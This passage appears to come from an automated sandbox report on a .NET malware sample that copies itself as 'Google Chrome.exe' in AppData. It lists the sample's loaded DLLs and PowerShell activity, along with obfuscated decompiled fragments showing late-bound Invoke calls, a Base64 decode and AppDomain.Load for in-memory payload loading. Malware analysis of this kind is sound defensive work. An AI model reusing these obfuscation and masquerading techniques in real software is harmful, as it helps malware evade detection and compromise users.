            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Google Chrome.exe | Section loaded: cryptbase.dll
            Source: C:\Users\user\Desktop\ra66DSpa.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
            Source: Window Recorder | Window detected: More than 3 window changes detected
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
            Source: ra66DSpa.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
            Source: ra66DSpa.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

            Data Obfuscation

            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZhGyxoza5P2dhAeTViAGQrQymdI6A.tZKUBmPSSjnMlVusAzaTB164ecu0j,ZhGyxoza5P2dhAeTViAGQrQymdI6A.utkds1sHMa1Xf90VAEG1mg76lXZd4,ZhGyxoza5P2dhAeTViAGQrQymdI6A.O3ztWmSRoMR13IM0UDED6IEl9GkzH,ZhGyxoza5P2dhAeTViAGQrQymdI6A.ZKP3enWbJqPqriGrjZgkATfTb4p5O,cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.VRguJ3EZ1BqVWQd8SJFupxhOdhQuQSrxi79c166A8QhBZ3y1SUqiHy0BNvpA71JfgpCl6VznwERaAvN()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2],cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.ZiLmvMKpvf7hguVyOJVySj4DJ5SxeCCT83XxkE5VglSiDkarDRNWH66xZFzv4Z8WSODxxQrwLOBoWHE(Convert.FromBase64String(QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{ZhGyxoza5P2dhAeTViAGQrQymdI6A.tZKUBmPSSjnMlVusAzaTB164ecu0j,ZhGyxoza5P2dhAeTViAGQrQymdI6A.utkds1sHMa1Xf90VAEG1mg76lXZd4,ZhGyxoza5P2dhAeTViAGQrQymdI6A.O3ztWmSRoMR13IM0UDED6IEl9GkzH,ZhGyxoza5P2dhAeTViAGQrQymdI6A.ZKP3enWbJqPqriGrjZgkATfTb4p5O,cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.VRguJ3EZ1BqVWQd8SJFupxhOdhQuQSrxi79c166A8QhBZ3y1SUqiHy0BNvpA71JfgpCl6VznwERaAvN()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2],cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.ZiLmvMKpvf7hguVyOJVySj4DJ5SxeCCT83XxkE5VglSiDkarDRNWH66xZFzv4Z8WSODxxQrwLOBoWHE(Convert.FromBase64String(QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[1] { QUrFKrEHyA5m0MKWHpNQaLSD0keXBPkb8yzNgVsHbFJImaQRJCvLrG6aIa0f5l[2] }}, (string[])null, (Type[])null, (bool[])null, true)
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc System.AppDomain.Load(byte[])
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai System.AppDomain.Load(byte[])
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc System.AppDomain.Load(byte[])
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai System.AppDomain.Load(byte[])
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs .Net Code: xwTQehdexDAx34zkVQsT2FpirbmUPXFdySq1RtPDpcA2kUDwdx5lZVaQW2X9Ai
            Source: C:\Users\user\Desktop\ra66DSpa.exe Code function: 0_2_00007FFD348A00BD pushad ; iretd 0_2_00007FFD348A00C1
            Source: C:\Users\user\Desktop\ra66DSpa.exe Code function: 0_2_00007FFD348A12FB push ebx; retf 0_2_00007FFD348A132A
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD3477D2A5 pushad ; iretd 2_2_00007FFD3477D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 2_2_00007FFD348900BD pushad ; iretd 2_2_00007FFD348900C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD3478D2A5 pushad ; iretd 5_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD348A2068 pushad ; retf 5_2_00007FFD348A23F1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD348A00BD pushad ; iretd 5_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD348A09AD push ss; retf 5_2_00007FFD348A09C6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD348A09C7 push ss; retf 5_2_00007FFD348A09C6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 5_2_00007FFD348AC2C5 push ebx; iretd 5_2_00007FFD348AC2DA
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD3478D2A5 pushad ; iretd 8_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD348A00BD pushad ; iretd 8_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 8_2_00007FFD348A1A9A push ss; retf 8_2_00007FFD348A1AD6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD3478D2A5 pushad ; iretd 10_2_00007FFD3478D2A6
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD348A00BD pushad ; iretd 10_2_00007FFD348A00C1
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 10_2_00007FFD34971411 pushad ; iretd 10_2_00007FFD34971431
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Code function: 17_2_00007FFD348900BD pushad ; iretd 17_2_00007FFD348900C1
            Source: C:\Users\user\AppData\Local\Google Chrome.exe Code function: 19_2_00007FFD348900BD pushad ; iretd 19_2_00007FFD348900C1
            Source: ra66DSpa.exe, 6sAiuDc8T0AQjYzDu7FuVJWwqHJQk6KIpuH50uWiNn2idMs6EEe56VRF9zhwI8TvOztJBugbwJwEnSx.cs High entropy of concatenated method names: 'C8oRXqtUk5Waj1geBhqvbgx6Bh7UE86fnL9iAHrOVLcT4v4ReWBXcGXKSzsbjrgKiKBlDVnXMpHfdyS', '_0Z97MrLIreSE02Sb0HSV2Tg3vjwylcc96AM5JkaINJMMdM9ryk9UETRz0JaNnVdtU8yRgpzobCNy5G9', 'VMqEOdmoATqawDDcZ7KQEVrHGVyatt3ON6MKtcQ0epxmn6OvEeUtcICbFRuQHqQGbuUhpb9GxZTuxkf', 'GPQeCjTKLOYOjqvkClz7NeRLViPgp4LM7UWfAEvnrV5oArJ4Prqwu6cFttbgxE2HsOhhSNu', 'TEzmj5QaAaw1rmMnTcGjLQLsO1OOFuy7ZnPhENjhUWPYkMMidVKaplir5MflxOtIpbkn9qx', 'ytWkQVNMdx2OjnbkwGwsjYFs9LoRE5g9pgoSaVi6IbtZfnXwuxAfEdrAm2thVEs5pB7pdrj', 'kam84myi9sxZfXhtdHmfskwgGOqBpGmK0MagvoCzuEDay4fG1t4PL018bLOPEWfhJ8oVejj', 'thyMUysAxTG0fl50Llxl93FwEZROp9JUxOwAv31Ql4hV7Chv7HNRoSNbDEHKhMCn1keIFjk', 'GBhv6KWGM3gcdFdRcf4yyTydoinEW81OLeyCO4mPkoOdEU7FuMcX7pIjEpj9PBSSEv1yB4t', 'HbwxoGvD4j942Vsbsll01jqzW16x0Gu22FU7WWiV2Iu86pfhCnqNte91BJVs2rg5EIpvArL'
            Source: ra66DSpa.exe, vOFbsYuz9VPub7FI3E7HQpnm2Chg9.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'HtEBbvSlYAhVI7zIdL2v47', '_7pQw0GBCjMo1wdzVGOlQxM', 'WaFQv85q03t08Vh7iNXy76', '_8yqC5Lj43iGp1Mxg1ZGacv'
            Source: ra66DSpa.exe, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.cs High entropy of concatenated method names: 'VX075nZMdK9OaLwwbmD5fxv7CCVwC2Le0cSZbkSE1GXBExMjUqVcySSslgrjl4', 'J4Gn3IwBd4ZmExBKAeLGfN6qgcMWa0TUjlVjwG2QrQJmQ87qLycDWtzbUIbi7x', 'zEsb7PRwNlRTVWCU4SLhcz86UA7SEYsKDkJ1zIqezOzONnsn5EDpuvLn6EplHN', 'NpDe7SCk402mKTrgqnE6Oun8zaxoVdeZhu8t2M6HqC6k8IieNutl32QXSVp7Dt', 'oCCye1z4hkSmzYlcJKdtJ9zr4YK1O7nVN25SYJnjMnCkdRd2lddlO3C3ffXIak', 'vkOW7zS9dzY3G5L4BJeMwSyHXuUWGE4Hau1YXF77zM3PoMi6LhGdMOQAPgrEKC', 'WtXKhBPZKzBNd6dwo7TvUUdirLIAOcPNDagJZ09ZcAkF54vD9idr0VT8K0YDBO', 'U41y3IrfkE7iNWpeoSbwXKyzERPHxSTDKDiQANadL0VxvCjUb4pQ6lxXFsNup9', 'sl0Zvi94FiGyEue6U1Y8sA6UVbPmYXJK6qnq9YzYLfa9XZV8k4eoSgqz9MhABT', 'oTIV3R6TduVwuwrmWyEdyksiNRiwgzivE3iCY3Gxtq0aGQa8J9j3X3SmvzPtw6'
            Source: ra66DSpa.exe, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.cs High entropy of concatenated method names: 'v4ZaC3YJaDnKAcqPNiTDJdisjmBFS5WXPaTQYMgrhJvWXoCRGFJn0zmmzFZySiNVggYJwmsIybD1scs', 'Hpv16SwIQVqRdK6qWRiZ3JQmu3HPFVbNQonGCvL', '_95AMRUssYAYGzjL4LVgehi95RPcWTVVYZxLtBLF', 'zPIPGJ09wvBP5Z8HDKUekK6i2rJWcznxRlXDFka', 'eTo2NrPKUY1QPGmFryFFAGeYxFwk4hyCKps9r1C'
            Source: ra66DSpa.exe, gxVelPSmWHEgdGj0TSDviwCJkIdSq.cs High entropy of concatenated method names: 'UuyoGAMxy5X1LShR3Vp5N3Lg8Ot8f', 'wTNnjbm4dosdHJ6Wj8w07OOmTZGcp', 'fRPMXtMldfe8W1IQFD4NQSoh1b8gf', 'FdsWqwmX9mP5MXl2fa7W7J0uI1Rvhm9ydiQkumcQYtwJvYePKF1Os6gRx3orBw', '_4XwnGqJMG9DfviIj1jrbf7vMuLpEOm2Ej5QTCYBRLHWsOT7qxqd5fQumDKM61W', 'R6k4ksdcevQhxfnl6og2dN7YPGXvXPablOKAhUNDbSHg2ltruPHwFlidYNzRSu', 'RfNcNaTo7R6KAr4Qrf1J9X', 'o7SERyRBRKbOvOozRX3x8F', 'tg6cKK1YTYGdjNpXh5v4BZ', '_3cu2UNa47DDJ9O9bcKoAc8'
            Source: ra66DSpa.exe, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs High entropy of concatenated method names: 'eKfSIvLNVPlS3ChT0tpFTdrW0dMOPwHgqLoU4kdy6RCEisgxwybcIXGmZyLN7t', 'pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc', 'UO9dzdpbqbL2ZT2Fns49RE5QogdH4ab8LGxhOV435rawSkpVinsiOR4R3SWMvc', 'aSBRAyHpdNaTBOdvbXg3rAjFrUlvJQ3qq4hv7LMJ8KLFHzbOmbJImTlNMPGmVM', 'jPTgRdypBu1pBpzAekAgSooyNRNHPjQrE4h87PfeSIcT9LGxpJeR9Bod3owQ9R', 'dxO8gQ4NsiLVLpAvYs11Guj6Wag7tBEwp3F1q6gUa5J6pR0CnX60WIy4e3EPlI', 'ZlW8bdapzGNwOhDtTL1G6GYOYnfio06CD1N7YHpwc2JUbKwMGeg88gtlrq3Pi4', 'Tm856ZsdTQgP90WAo0kVcpRBCfmk0MX1fGcBSGiH4spQo0wwlW2Ji4xv55KaBX', 'ptrY1L6Idz32UGpfhjcojN3OMMKojnre0rTTEYHCoexxBGTrtiifcafNP1VTnu', 'g6zcRjuZf48JsGj8dtGClKqn05hvb7ffaiZzmv8Hh8qmprOYZ4mrHN2C58ihy4'
            Source: ra66DSpa.exe, J98X1BFg5gJL3LEHshTwd7ce57sCLsSpHnQqNrNz84Npmlezw2ixv8EEP5lxKEpatP2fuOektELGGi3GtcfrtkZaIfjYLk.cs High entropy of concatenated method names: 'wZBM5ojQGg2RjahBa0WkrFlLdUlrceKHzCh8k7cn9VhFqGSrOpBb52KtHrihcqLeWB9gTNfWkLbuXDDcZq8qqsINfEOno2', 'wt8jkByqmQcTZ14EKz0D1CJHwfO6sWgoMjwYgBl9X6qFtey5tYJD9hWYzD2etV50MzK8gYiiLOFX7hP97LPWmfBdUvcBVV', '_1Yvd7EP7SB6xtR2aA4XS3q6pEV9psxrWoS51QDeTtLjnW6csAzoFchtQZ0Hy3QALOkJtI85STN8Ikrd8Eg8oRb0GpDudYX', '_2gBhZ5BoLgO7u9tA5Bs1kbvrp5UPsdypzngGLrlO1dQRDxCFsXPJSaa0xACeedejo8MU60z6sAvHris7MZEbzyNfW6IIIu', 'qfgQB4qqEeK9tpNoSXUPndeHk4lXo16H6Knuuy70v9O123Xq3FKSyrgr6f9XnBpU52MMjRwAEDm7DbOWKOfLPxoZ7dYZXF', 'YTM9aN9h740QuL85XhcEiyOeKSEiwEpfDqbftaEUZgdWHI8mB8I28TszOAfkBOwpSDTANckW5pso3Un1inNHIJS9zV4JKl', 'Gxd5xXvz2rvgslCHArV2lXa8jegIsnWSOkAajwjt5VdyIr3I622JavRq7K1Dw27ATUa01rDFh4EAMEFjpccLELbCcEZ7IQ', 'hb6xelOkw13KbjQ9m71WiKLtmvsmR1ST5Bl6Ej1tzVynu5mszrwrNKehECVG6UVK9i48wAvCWoQekcL4wiiXNqT4nxmUPD', 'gpLJRiK9Rfsna9Ipj6kjn3mIDnNYGHmEoNuuhxKpzLY6kiWroTybdagMIZIOpWGqJc8lrFSsqkOndqyPFc9paKtPjYY3n2', 'ZFlK2bqHQgKtiWRVpSD9tlolsspNausjEn9BpNuEIennHCiWaeKnnwHUBz1k96JO7nBXRyKync4TXdGdPYENLFVVOjIcIh'
            Source: ra66DSpa.exe, cMzvLdNmVSKXImH2QyPEJ7EjmUThNn0HSHI5NiEiVHFX55sWizMMZ20xoVI85CtVqRk5jgxMueGBEaV.cs High entropy of concatenated method names: '_1SeOnvg2opDAPsTRUItiyarIPhcivQDw58fw5sIDXHH9hkbVNR6tBJbyrzqoF15r6s39DnPDvVYRZsE', 'GI7actamk5DaZIvBTBSGE6BKt4OMXEURZS1ihUyGCFpREbHt0XLcZKvxYeZj8A28nOsX0h4VUDimPIK', 'fBM7Vf76rL4NxUgLIUcHalZYOfyKuhj7SKCuOpOX0LPwgK3aM7cj4PvORUYAgcubV2jlJefyugaKcv6', 'Q4zTAi9G7jn5vyBK1cmEpk54abk9d2RPMamwhJ5B56XXKAz9xzbuwMKfKW8nUCF1UCYekUp1MzGIDUQ', '_2S8DHJAELWwXKGLXTElV2YhAAWpEnVzn4sj2lK7SSGXtzKKSlQ8eGTAzcBstZbcuY2eMXPCzxx0wQzg', 'vY1LbThbKHuRexLVDjmWCWr8e1Qfxka04LEvgGDhxAxf3rCtUcyYufCk1UQo0fJt6XG1EgX36hTPIdy', 'uOcpFnXWyqtLDFG6xHuQpl4OoKNJNCfSbiJcp7QEcpziaOu32vif4yOca4QiiaGqKgpRuv4DKmi8ZZl', 'A2kpZzLKth0vkyLZawo5qtIB5n0tIE5aZF1YKk4zNcMSYk617daNSvAVNpLIQTC1mLwbNibhrE1x9ug', '_8S4mWXblVKfCSFlBSfxIAkBmCKQ1VhdFzZeS02W1YWpVNxNuKvmsMwHfRMW96JvkG8QVHcNDKiDqFFC', 'htUAjReymaUvK5qkAX1YQxbzo6VvIEqHBKL4iaZPZf9ZzLo8ulBehcqNuervWpzgeNTm0cvvxACqVMA'
            Source: ra66DSpa.exe, EIPsVow9UCeNztykmrhINOiUil0Z52Gi3H9Gbg0oawiqwjz7kGFYijU1XPu2hAqcmAN7jbnGDMeOWHQpPyjCppdxYWrLcF.cs High entropy of concatenated method names: '_1gfP3s9GmHdjwlxEFWeY7B9aoMNhEANDttTs2tpukKTu4MjJ8sIfETZxRkx1cj62b5Zjnl3GNQDADAiFjNQ9i8EfzMt8lF', '_65xDJzJGgKfGCfbaH8yFcgC9A2PbWh2edZTyiL1v26AyyxvYn685JSiqC7zPYTTQyoMF5otVfxaHtcu', 'bWW5eN9JpyUHVz07OGzHwM2Or9LlpbZXL2gRKfw5Rt9fG2xetFYi4lTqR7JrrQj8u1KIvLz4Tw8ece0', '_7FfoN83I62Qozf5uY6VK5UeISxgSpAQ7bEMgJ317skvbSBxmSnKuqax2XrKwlrRe6QCzyWClxOuW7i7', 'MIzCUJYNn4A5EKsGfaX5PMX1VXDXi9sNMMnCfxq', 'KXJ26WZ2qeMh1dR1og13OPzfRT93uDQDQ3qMB4U', 'iDO0UXmoXeLZce2DSGeFDXveCA9Xh83hKE1uKy4', 'AXx7UD5abpOMxLIMV26D9q45tPPe1CjgXdtS4h5', 'PlcfdaIeVxYZf2VJSRplvYjIE0izEPRoPGHqJ9U', '_6Vpjln0moI6OAarOC7UbjdR3P99tk8UuRThgwH5'
            Source: ra66DSpa.exe, khpJTONaip9rT88b3VfF2YRz7tYSJsVeufU9NBWttPrjMfB7GOKq1mB11RyuI1.cs High entropy of concatenated method names: 'QN0cTZO60jBqUSOguU6PP3nr0BE9aMV62uvv5wDmbnw2RuMSW98lV9SiTZkF0BQoOp57Tl5Rzll0nnPnYGuDB9v9jpHGb6', 'itYLttotGEqSiKH8z86Oy96Fw8WrbsMDhw1WvDu', 'PUhk1m505bp6HQgHvUorAUwpL5IiXbxWcYveDkr', 'NGBjajTaeK0vlsZi9iSxRBTvZ2g9cSVsCKlW4QJ', 'DJm0WGqaQjKD7TXVer9qVnM0gotGEE06VyYzWCa'
            Source: Google Chrome.exe.0.dr, 6sAiuDc8T0AQjYzDu7FuVJWwqHJQk6KIpuH50uWiNn2idMs6EEe56VRF9zhwI8TvOztJBugbwJwEnSx.cs High entropy of concatenated method names: 'C8oRXqtUk5Waj1geBhqvbgx6Bh7UE86fnL9iAHrOVLcT4v4ReWBXcGXKSzsbjrgKiKBlDVnXMpHfdyS', '_0Z97MrLIreSE02Sb0HSV2Tg3vjwylcc96AM5JkaINJMMdM9ryk9UETRz0JaNnVdtU8yRgpzobCNy5G9', 'VMqEOdmoATqawDDcZ7KQEVrHGVyatt3ON6MKtcQ0epxmn6OvEeUtcICbFRuQHqQGbuUhpb9GxZTuxkf', 'GPQeCjTKLOYOjqvkClz7NeRLViPgp4LM7UWfAEvnrV5oArJ4Prqwu6cFttbgxE2HsOhhSNu', 'TEzmj5QaAaw1rmMnTcGjLQLsO1OOFuy7ZnPhENjhUWPYkMMidVKaplir5MflxOtIpbkn9qx', 'ytWkQVNMdx2OjnbkwGwsjYFs9LoRE5g9pgoSaVi6IbtZfnXwuxAfEdrAm2thVEs5pB7pdrj', 'kam84myi9sxZfXhtdHmfskwgGOqBpGmK0MagvoCzuEDay4fG1t4PL018bLOPEWfhJ8oVejj', 'thyMUysAxTG0fl50Llxl93FwEZROp9JUxOwAv31Ql4hV7Chv7HNRoSNbDEHKhMCn1keIFjk', 'GBhv6KWGM3gcdFdRcf4yyTydoinEW81OLeyCO4mPkoOdEU7FuMcX7pIjEpj9PBSSEv1yB4t', 'HbwxoGvD4j942Vsbsll01jqzW16x0Gu22FU7WWiV2Iu86pfhCnqNte91BJVs2rg5EIpvArL'
            Source: Google Chrome.exe.0.dr, vOFbsYuz9VPub7FI3E7HQpnm2Chg9.cs High entropy of concatenated method names: 'Equals', 'GetHashCode', 'GetType', 'ToString', 'Create__Instance__', 'Dispose__Instance__', 'HtEBbvSlYAhVI7zIdL2v47', '_7pQw0GBCjMo1wdzVGOlQxM', 'WaFQv85q03t08Vh7iNXy76', '_8yqC5Lj43iGp1Mxg1ZGacv'
            Source: Google Chrome.exe.0.dr, JE3MyWDhSci5SqRxDY2LszRRtRrMFG5pnuiN9BawburQvvE3IgB9xUM6OYalXv.cs High entropy of concatenated method names: 'VX075nZMdK9OaLwwbmD5fxv7CCVwC2Le0cSZbkSE1GXBExMjUqVcySSslgrjl4', 'J4Gn3IwBd4ZmExBKAeLGfN6qgcMWa0TUjlVjwG2QrQJmQ87qLycDWtzbUIbi7x', 'zEsb7PRwNlRTVWCU4SLhcz86UA7SEYsKDkJ1zIqezOzONnsn5EDpuvLn6EplHN', 'NpDe7SCk402mKTrgqnE6Oun8zaxoVdeZhu8t2M6HqC6k8IieNutl32QXSVp7Dt', 'oCCye1z4hkSmzYlcJKdtJ9zr4YK1O7nVN25SYJnjMnCkdRd2lddlO3C3ffXIak', 'vkOW7zS9dzY3G5L4BJeMwSyHXuUWGE4Hau1YXF77zM3PoMi6LhGdMOQAPgrEKC', 'WtXKhBPZKzBNd6dwo7TvUUdirLIAOcPNDagJZ09ZcAkF54vD9idr0VT8K0YDBO', 'U41y3IrfkE7iNWpeoSbwXKyzERPHxSTDKDiQANadL0VxvCjUb4pQ6lxXFsNup9', 'sl0Zvi94FiGyEue6U1Y8sA6UVbPmYXJK6qnq9YzYLfa9XZV8k4eoSgqz9MhABT', 'oTIV3R6TduVwuwrmWyEdyksiNRiwgzivE3iCY3Gxtq0aGQa8J9j3X3SmvzPtw6'
            Source: Google Chrome.exe.0.dr, SMSgUiSVv3VmiBEwi2DMT63wt7smZiXjq0LioRiB1et93rMTrPHdUXWiqvmZhjDIhf9bNc6DkVqdsNh.cs High entropy of concatenated method names: 'v4ZaC3YJaDnKAcqPNiTDJdisjmBFS5WXPaTQYMgrhJvWXoCRGFJn0zmmzFZySiNVggYJwmsIybD1scs', 'Hpv16SwIQVqRdK6qWRiZ3JQmu3HPFVbNQonGCvL', '_95AMRUssYAYGzjL4LVgehi95RPcWTVVYZxLtBLF', 'zPIPGJ09wvBP5Z8HDKUekK6i2rJWcznxRlXDFka', 'eTo2NrPKUY1QPGmFryFFAGeYxFwk4hyCKps9r1C'
            Source: Google Chrome.exe.0.dr, gxVelPSmWHEgdGj0TSDviwCJkIdSq.cs High entropy of concatenated method names: 'UuyoGAMxy5X1LShR3Vp5N3Lg8Ot8f', 'wTNnjbm4dosdHJ6Wj8w07OOmTZGcp', 'fRPMXtMldfe8W1IQFD4NQSoh1b8gf', 'FdsWqwmX9mP5MXl2fa7W7J0uI1Rvhm9ydiQkumcQYtwJvYePKF1Os6gRx3orBw', '_4XwnGqJMG9DfviIj1jrbf7vMuLpEOm2Ej5QTCYBRLHWsOT7qxqd5fQumDKM61W', 'R6k4ksdcevQhxfnl6og2dN7YPGXvXPablOKAhUNDbSHg2ltruPHwFlidYNzRSu', 'RfNcNaTo7R6KAr4Qrf1J9X', 'o7SERyRBRKbOvOozRX3x8F', 'tg6cKK1YTYGdjNpXh5v4BZ', '_3cu2UNa47DDJ9O9bcKoAc8'
            Source: Google Chrome.exe.0.dr, 6C2MmfAihehoIqT5Hz0DqUT7xXISORcDmyXfIclG2W0utTZ5q00mJzgCKCNG6F.cs High entropy of concatenated method names: 'eKfSIvLNVPlS3ChT0tpFTdrW0dMOPwHgqLoU4kdy6RCEisgxwybcIXGmZyLN7t', 'pcHmWoBW3GjFu1DUMkppEeaiX6XUR0coTwroZbVE2JqKW90S2RZPxFgYQPfqEc', 'UO9dzdpbqbL2ZT2Fns49RE5QogdH4ab8LGxhOV435rawSkpVinsiOR4R3SWMvc', 'aSBRAyHpdNaTBOdvbXg3rAjFrUlvJQ3qq4hv7LMJ8KLFHzbOmbJImTlNMPGmVM', 'jPTgRdypBu1pBpzAekAgSooyNRNHPjQrE4h87PfeSIcT9LGxpJeR9Bod3owQ9R', 'dxO8gQ4NsiLVLpAvYs11Guj6Wag7tBEwp3F1q6gUa5J6pR0CnX60WIy4e3EPlI', 'ZlW8bdapzGNwOhDtTL1G6GYOYnfio06CD1N7YHpwc2JUbKwMGeg88gtlrq3Pi4', 'Tm856ZsdTQgP90WAo0kVcpRBCfmk0MX1fGcBSGiH4spQo0wwlW2Ji4xv55KaBX', 'ptrY1L6Idz32UGpfhjcojN3OMMKojnre0rTTEYHCoexxBGTrtiifcafNP1VTnu', 'g6zcRjuZf48JsGj8dtGClKqn05hvb7ffaiZzmv8Hh8qmprOYZ4mrHN2C58ihy4'
